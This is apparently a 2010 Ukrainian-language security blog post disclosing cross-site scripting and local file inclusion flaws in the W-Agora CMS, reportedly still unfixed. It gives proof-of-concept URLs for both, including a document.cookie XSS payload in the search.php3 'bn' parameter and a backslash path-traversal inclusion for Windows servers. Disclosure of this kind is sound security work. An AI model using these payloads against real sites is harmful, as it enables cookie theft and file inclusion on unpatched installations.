Уразливості в W-Agora
15:01 22.10.201027.08.2010
У березні, 15.03.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на сайті maidan.org.ua. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в W-Agora.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
22.10.2010
XSS:
http://site/news/search.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
Local File Inclusion:
Можна інклюдити php-файли (з розширенням php3 в версії W-Agora 4.1.5 або з розширенням php в версії 4.2.1).
В папці conf:
http://site/news/search.php3?bn=1
В будь-які папці (тільки на Windows-серверах):
http://site/news/search.php3?bn=..\1
Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи search.php3 має ім’я search.php. Розробник системи дані уразливості не виправив.